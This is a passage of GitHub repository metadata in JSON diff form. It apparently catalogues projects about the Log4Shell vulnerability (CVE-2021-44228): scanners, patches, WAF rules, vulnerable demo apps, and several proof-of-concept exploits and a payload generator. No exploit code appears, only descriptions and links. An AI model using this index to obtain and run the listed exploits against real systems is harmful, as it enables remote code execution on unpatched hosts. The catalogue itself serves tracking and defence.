14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 440799948, + "name": "Log4Shell", + "full_name": "r00thunter\/Log4Shell", + "owner": { + "login": "r00thunter", + "id": 33806985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33806985?v=4", + "html_url": "https:\/\/github.com\/r00thunter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00thunter\/Log4Shell", + "description": "Generic Scanner for Apache log4j RCE CVE-2021-44228", + "fork": false, + "created_at": "2021-12-22T09:15:47Z", + "updated_at": "2024-08-24T16:05:08Z", + "pushed_at": "2021-12-22T09:19:15Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440816228, + "name": "cve-2021-44228-fix-jars", + "full_name": "asyzdykov\/cve-2021-44228-fix-jars", + "owner": { + "login": "asyzdykov", + "id": 1106604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1106604?v=4", + "html_url": "https:\/\/github.com\/asyzdykov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asyzdykov\/cve-2021-44228-fix-jars", + "description": "CVE-2021-44228-FIX-JARS", + "fork": false, + "created_at": "2021-12-22T10:16:22Z", + "updated_at": "2021-12-23T09:04:57Z", + "pushed_at": "2021-12-23T09:04:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 440932687, + "name": "log4j-scanner", + "full_name": "BJLIYANLIANG\/log4j-scanner", + "owner": { + "login": "BJLIYANLIANG", + "id": 34064679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34064679?v=4", + "html_url": "https:\/\/github.com\/BJLIYANLIANG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BJLIYANLIANG\/log4j-scanner", + "description": "Log4j 2 (CVE-2021-44228) vulnerability scanner for Windows OS", + "fork": false, + "created_at": "2021-12-22T17:17:59Z", + "updated_at": "2021-12-24T00:57:34Z", + "pushed_at": "2021-12-19T01:59:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 441001904, + "name": "Apache-Log4j-POC", + "full_name": "badb33f\/Apache-Log4j-POC", + "owner": { + "login": "badb33f", + "id": 61085462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61085462?v=4", + "html_url": "https:\/\/github.com\/badb33f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badb33f\/Apache-Log4j-POC", + "description": "Proof of Concept of apache log4j LDAP lookup vulnerability. CVE-2021-44228", + "fork": false, + "created_at": "2021-12-22T22:44:07Z", + "updated_at": "2023-04-06T19:12:21Z", + "pushed_at": "2021-12-22T22:51:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 441034050, + "name": "CVE-2021-44228-log4jVulnScanner-metasploit", + "full_name": "TaroballzChen\/CVE-2021-44228-log4jVulnScanner-metasploit", + "owner": { + "login": "TaroballzChen", + "id": 27862593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4", + "html_url": "https:\/\/github.com\/TaroballzChen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2021-44228-log4jVulnScanner-metasploit", + "description": "open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability", + "fork": false, + "created_at": "2021-12-23T01:59:03Z", + "updated_at": "2024-08-12T20:19:08Z", + "pushed_at": "2021-12-23T07:40:13Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 441188076, + "name": "ansible-role-log4shell", + "full_name": "lucab85\/ansible-role-log4shell", + "owner": { + "login": "lucab85", + "id": 24267107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24267107?v=4", + "html_url": "https:\/\/github.com\/lucab85", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lucab85\/ansible-role-log4shell", + "description": "Ansible playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 for Log4Shell (CVE-2021-44228).", + "fork": false, + "created_at": "2021-12-23T13:24:41Z", + "updated_at": "2023-05-13T06:51:06Z", + "pushed_at": "2022-01-10T22:21:34Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "devsecops", + "log4j", + "log4shell", + "security" + ], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 441364313, + "name": "log4j-CVE-2021-44228-workaround", + "full_name": "grimch\/log4j-CVE-2021-44228-workaround", + "owner": { + "login": "grimch", + "id": 58831200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58831200?v=4", + "html_url": "https:\/\/github.com\/grimch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grimch\/log4j-CVE-2021-44228-workaround", + "description": "general purpose workaround for the log4j CVE-2021-44228 vulnerability", + "fork": false, + "created_at": "2021-12-24T04:23:17Z", + "updated_at": "2021-12-24T13:35:26Z", + "pushed_at": "2021-12-24T13:35:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 441423344, + "name": "log4j-shell-csw", + "full_name": "cybersecurityworks553\/log4j-shell-csw", + "owner": { + "login": "cybersecurityworks553", + "id": 63910792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63910792?v=4", + "html_url": "https:\/\/github.com\/cybersecurityworks553", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cybersecurityworks553\/log4j-shell-csw", + "description": "A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability.", + "fork": false, + "created_at": "2021-12-24T09:26:38Z", + "updated_at": "2024-02-26T06:42:44Z", + "pushed_at": "2021-12-24T10:16:10Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 441453543, + "name": "log4j-scan", + "full_name": "Toolsec\/log4j-scan", + "owner": { + "login": "Toolsec", + "id": 76109742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76109742?v=4", + "html_url": "https:\/\/github.com\/Toolsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Toolsec\/log4j-scan", + "description": "CVE-2021-44228 检查工具", + "fork": false, + "created_at": "2021-12-24T11:54:21Z", + "updated_at": "2022-05-09T13:18:05Z", + "pushed_at": "2021-12-24T02:39:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 441470836, + "name": "Log4jUnifi", + "full_name": "puzzlepeaches\/Log4jUnifi", + "owner": { + "login": "puzzlepeaches", + "id": 8538866, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8538866?v=4", + "html_url": "https:\/\/github.com\/puzzlepeaches", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puzzlepeaches\/Log4jUnifi", + "description": "Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more.", + "fork": false, + "created_at": "2021-12-24T13:18:49Z", + "updated_at": "2024-11-12T14:54:31Z", + "pushed_at": "2024-01-04T17:12:05Z", + "stargazers_count": 143, + "watchers_count": 143, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 143, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 441536293, + "name": "apache-tomcat-log4j", + "full_name": "many-fac3d-g0d\/apache-tomcat-log4j", + "owner": { + "login": "many-fac3d-g0d", + "id": 54078651, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54078651?v=4", + "html_url": "https:\/\/github.com\/many-fac3d-g0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/many-fac3d-g0d\/apache-tomcat-log4j", + "description": "Log4j2 CVE-2021-44228 Vulnerability POC in Apache Tomcat", + "fork": false, + "created_at": "2021-12-24T18:54:46Z", + "updated_at": "2023-07-29T23:22:45Z", + "pushed_at": "2021-12-24T18:57:32Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 441540913, + "name": "CVE-2021-44228", + "full_name": "marcourbano\/CVE-2021-44228", + "owner": { + "login": "marcourbano", + "id": 22402683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22402683?v=4", + "html_url": "https:\/\/github.com\/marcourbano", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/marcourbano\/CVE-2021-44228", + "description": "PoC for CVE-2021-44228.", + "fork": false, + "created_at": "2021-12-24T19:26:36Z", + "updated_at": "2024-04-19T14:48:49Z", + "pushed_at": "2022-09-22T19:16:07Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 441545718, + "name": "log4shell-vulnerable-app", + "full_name": "bsigouin\/log4shell-vulnerable-app", + "owner": { + "login": "bsigouin", + "id": 48130586, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48130586?v=4", + "html_url": "https:\/\/github.com\/bsigouin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bsigouin\/log4shell-vulnerable-app", + "description": "Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.", + "fork": false, + "created_at": "2021-12-24T20:00:12Z", + "updated_at": "2022-01-06T13:31:29Z", + "pushed_at": "2023-01-20T17:03:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 441678815, + "name": "XSYS-Log4J2Shell-Ex", + "full_name": "ToxicEnvelope\/XSYS-Log4J2Shell-Ex", + "owner": { + "login": "ToxicEnvelope", + "id": 23465872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23465872?v=4", + "html_url": "https:\/\/github.com\/ToxicEnvelope", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ToxicEnvelope\/XSYS-Log4J2Shell-Ex", + "description": "this repository contains a POC of CVE-2021-44228 (log4j2shell) as part of a security research", + "fork": false, + "created_at": "2021-12-25T12:53:13Z", + "updated_at": "2021-12-27T20:08:44Z", + "pushed_at": "2021-12-27T20:08:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 442033629, + "name": "ModSec-log4j2", + "full_name": "felipe8398\/ModSec-log4j2", + "owner": { + "login": "felipe8398", + "id": 24979677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24979677?v=4", + "html_url": "https:\/\/github.com\/felipe8398", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/felipe8398\/ModSec-log4j2", + "description": "Regra ModSec para proteção log4j2 - CVE-2021-44228", + "fork": false, + "created_at": "2021-12-27T02:53:24Z", + "updated_at": "2022-06-19T02:08:13Z", + "pushed_at": "2022-03-10T22:09:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "docker" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442071358, + "name": "Log4j_Attacker_IPList", + "full_name": "ceyhuncamli\/Log4j_Attacker_IPList", + "owner": { + "login": "ceyhuncamli", + "id": 57198926, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57198926?v=4", + "html_url": "https:\/\/github.com\/ceyhuncamli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ceyhuncamli\/Log4j_Attacker_IPList", + "description": "CVE-2021-44228", + "fork": false, + "created_at": "2021-12-27T06:29:12Z", + "updated_at": "2021-12-27T06:34:21Z", + "pushed_at": "2021-12-27T06:34:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442073643, + "name": "log4j-vulnerability", + "full_name": "mazhar-hassan\/log4j-vulnerability", + "owner": { + "login": "mazhar-hassan", + "id": 32394814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32394814?v=4", + "html_url": "https:\/\/github.com\/mazhar-hassan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mazhar-hassan\/log4j-vulnerability", + "description": "Log4Shell (CVE-2021-44228) is a zero-day vulnerability in Log4j", + "fork": false, + "created_at": "2021-12-27T06:39:40Z", + "updated_at": "2021-12-27T09:33:39Z", + "pushed_at": "2022-08-23T13:47:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442118241, + "name": "VTI-IOCs-CVE-2021-44228", + "full_name": "xungzzz\/VTI-IOCs-CVE-2021-44228", + "owner": { + "login": "xungzzz", + "id": 78672731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78672731?v=4", + "html_url": "https:\/\/github.com\/xungzzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xungzzz\/VTI-IOCs-CVE-2021-44228", + "description": "IOCs for CVE-2021-44228", + "fork": false, + "created_at": "2021-12-27T09:51:13Z", + "updated_at": "2021-12-27T09:51:13Z", + "pushed_at": "2021-12-27T09:51:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442217104, + "name": "l4s_poc", + "full_name": "s-retlaw\/l4s_poc", + "owner": { + "login": "s-retlaw", + "id": 73955369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73955369?v=4", + "html_url": "https:\/\/github.com\/s-retlaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s-retlaw\/l4s_poc", + "description": "Log4Shell (Cve-2021-44228) Proof Of Concept", + "fork": false, + "created_at": "2021-12-27T16:45:58Z", + "updated_at": "2022-01-04T14:50:09Z", + "pushed_at": "2023-07-25T20:05:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 442222189, + "name": "CVE-2021-44228-Apache-Log4j-Rce-main", + "full_name": "Ravid-CheckMarx\/CVE-2021-44228-Apache-Log4j-Rce-main", + "owner": { + "login": "Ravid-CheckMarx", + "id": 84515813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84515813?v=4", + "html_url": "https:\/\/github.com\/Ravid-CheckMarx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ravid-CheckMarx\/CVE-2021-44228-Apache-Log4j-Rce-main", + "description": null, + "fork": false, + "created_at": "2021-12-27T17:06:26Z", + "updated_at": "2021-12-28T08:39:10Z", + "pushed_at": "2021-12-27T17:06:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442235397, + "name": "log4j-payload-generator", + "full_name": "yesspider-hacker\/log4j-payload-generator", + "owner": { + "login": "yesspider-hacker", + "id": 76931387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76931387?v=4", + "html_url": "https:\/\/github.com\/yesspider-hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yesspider-hacker\/log4j-payload-generator", + "description": "log4j-paylaod generator : A generic payload generator for Apache log4j RCE CVE-2021-44228", + "fork": false, + "created_at": "2021-12-27T18:02:15Z", + "updated_at": "2023-01-08T10:49:19Z", + "pushed_at": "2021-12-27T18:38:10Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442255773, + "name": "log4shell_scanner", + "full_name": "LinkMJB\/log4shell_scanner", + "owner": { + "login": "LinkMJB", + "id": 8824103, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8824103?v=4", + "html_url": "https:\/\/github.com\/LinkMJB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LinkMJB\/log4shell_scanner", + "description": "Quick and dirty scanner, hitting common ports looking for Log4Shell (CVE-2021-44228) vulnerability", + "fork": false, + "created_at": "2021-12-27T19:36:29Z", + "updated_at": "2021-12-27T19:40:45Z", + "pushed_at": "2021-12-27T19:40:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 442317732, + "name": "Vm4J", + "full_name": "NS-Sp4ce\/Vm4J", + "owner": { + "login": "NS-Sp4ce", + "id": 33349032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33349032?v=4", + "html_url": "https:\/\/github.com\/NS-Sp4ce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NS-Sp4ce\/Vm4J", + "description": "A tool for detect&exploit vmware product log4j(cve-2021-44228) vulnerability.Support VMware HCX\/vCenter\/NSX\/Horizon\/vRealize Operations Manager", + "fork": false, + "created_at": "2021-12-28T01:37:20Z", + "updated_at": "2024-11-16T18:38:44Z", + "pushed_at": "2022-01-24T05:37:34Z", + "stargazers_count": 204, + "watchers_count": 204, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j2-exp", + "log4shell", + "vmsa-2021-0028" + ], + "visibility": "public", + "forks": 39, + "watchers": 204, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 442533490, + "name": "LogJackFix", + "full_name": "PoneyClairDeLune\/LogJackFix", + "owner": { + "login": "PoneyClairDeLune", + "id": 88174309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88174309?v=4", + "html_url": "https:\/\/github.com\/PoneyClairDeLune", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PoneyClairDeLune\/LogJackFix", + "description": "A spigot plugin to fix CVE-2021-44228 Log4j remote code execution vulnerability, to protect Minecraft clients.", + "fork": false, + "created_at": "2021-12-28T17:18:13Z", + "updated_at": "2021-12-28T17:26:16Z", + "pushed_at": "2021-12-28T17:26:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 443163405, + "name": "log4j-vulnerability", + "full_name": "MarceloLeite2604\/log4j-vulnerability", + "owner": { + "login": "MarceloLeite2604", + "id": 13152452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13152452?v=4", + "html_url": "https:\/\/github.com\/MarceloLeite2604", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarceloLeite2604\/log4j-vulnerability", + "description": "Presents how to exploit CVE-2021-44228 vulnerability.", + "fork": false, + "created_at": "2021-12-30T19:10:21Z", + "updated_at": "2023-08-15T12:50:39Z", + "pushed_at": "2022-01-03T17:14:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 443422203, + "name": "log4shell-vulnerable-app", + "full_name": "romanutti\/log4shell-vulnerable-app", + "owner": { + "login": "romanutti", + "id": 36601005, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36601005?v=4", + "html_url": "https:\/\/github.com\/romanutti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/romanutti\/log4shell-vulnerable-app", + "description": "This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, known as log4shell.", + "fork": false, + "created_at": "2021-12-31T20:39:44Z", + "updated_at": "2022-01-01T10:57:33Z", + "pushed_at": "2022-05-10T17:20:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 443941194, + "name": "log4j2-test", + "full_name": "mklinkj\/log4j2-test", + "owner": { + "login": "mklinkj", + "id": 96992046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96992046?v=4", + "html_url": "https:\/\/github.com\/mklinkj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mklinkj\/log4j2-test", + "description": "Log4j2 LDAP 취약점 테스트 (CVE-2021-44228)", + "fork": false, + "created_at": "2022-01-03T04:36:41Z", + "updated_at": "2024-01-14T11:55:27Z", + "pushed_at": "2024-01-13T19:12:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j2" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 444275342, + "name": "4jfinder.github.io", + "full_name": "4jfinder\/4jfinder.github.io", + "owner": { + "login": "4jfinder", + "id": 97116800, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97116800?v=4", + "html_url": "https:\/\/github.com\/4jfinder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4jfinder\/4jfinder.github.io", + "description": "Searchable page for CISA Log4j (CVE-2021-44228) Affected Vendor & Software List", + "fork": false, + "created_at": "2022-01-04T03:37:03Z", + "updated_at": "2022-08-17T00:21:21Z", + "pushed_at": "2022-02-25T08:52:45Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 444603389, + "name": "CVE-2021-44228_scanner-main-Modified-", + "full_name": "alexpena5635\/CVE-2021-44228_scanner-main-Modified-", + "owner": { + "login": "alexpena5635", + "id": 74330769, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74330769?v=4", + "html_url": "https:\/\/github.com\/alexpena5635", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexpena5635\/CVE-2021-44228_scanner-main-Modified-", + "description": null, + "fork": false, + "created_at": "2022-01-05T00:14:08Z", + "updated_at": "2022-01-09T01:45:00Z", + "pushed_at": "2022-07-10T22:02:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 445474259, + "name": "log4jshell_CVE-2021-44228", + "full_name": "Vulnmachines\/log4jshell_CVE-2021-44228", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/log4jshell_CVE-2021-44228", + "description": "Log4jshell - CVE-2021-44228", + "fork": false, + "created_at": "2022-01-07T09:56:30Z", + "updated_at": "2023-03-31T16:40:36Z", + "pushed_at": "2022-07-26T05:17:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 445687561, + "name": "log4j-fuzzer", + "full_name": "mr-vill4in\/log4j-fuzzer", + "owner": { + "login": "mr-vill4in", + "id": 51061936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51061936?v=4", + "html_url": "https:\/\/github.com\/mr-vill4in", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-vill4in\/log4j-fuzzer", + "description": "CVE-2021-44228", + "fork": false, + "created_at": "2022-01-08T00:28:32Z", + "updated_at": "2022-08-25T01:38:48Z", + "pushed_at": "2022-03-19T21:10:47Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 446218653, + "name": "log4jhound", + "full_name": "mebibite\/log4jhound", + "owner": { + "login": "mebibite", + "id": 54244269, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54244269?v=4", + "html_url": "https:\/\/github.com\/mebibite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mebibite\/log4jhound", + "description": "Created after the disclosure of CVE-2021-44228. Bash script that detects Log4j occurrences in your projects and systems, allowing you to get insight on versions used. Unpacks JARs and analyses their Manifest files.", + "fork": false, + "created_at": "2022-01-09T22:34:49Z", + "updated_at": "2024-04-22T19:41:40Z", + "pushed_at": "2022-04-01T00:43:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 447404470, + "name": "log4shell", + "full_name": "jxerome\/log4shell", + "owner": { + "login": "jxerome", + "id": 1355634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1355634?v=4", + "html_url": "https:\/\/github.com\/jxerome", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jxerome\/log4shell", + "description": "Démo du fonctionnement de log4shell (CVE-2021-44228)", + "fork": false, + "created_at": "2022-01-12T23:44:20Z", + "updated_at": "2022-01-12T23:59:13Z", + "pushed_at": "2022-01-14T14:03:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 447615580, + "name": "Log4j-CVE-2021-44228", + "full_name": "solitarysp\/Log4j-CVE-2021-44228", + "owner": { + "login": "solitarysp", + "id": 20993683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20993683?v=4", + "html_url": "https:\/\/github.com\/solitarysp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/solitarysp\/Log4j-CVE-2021-44228", + "description": null, + "fork": false, + "created_at": 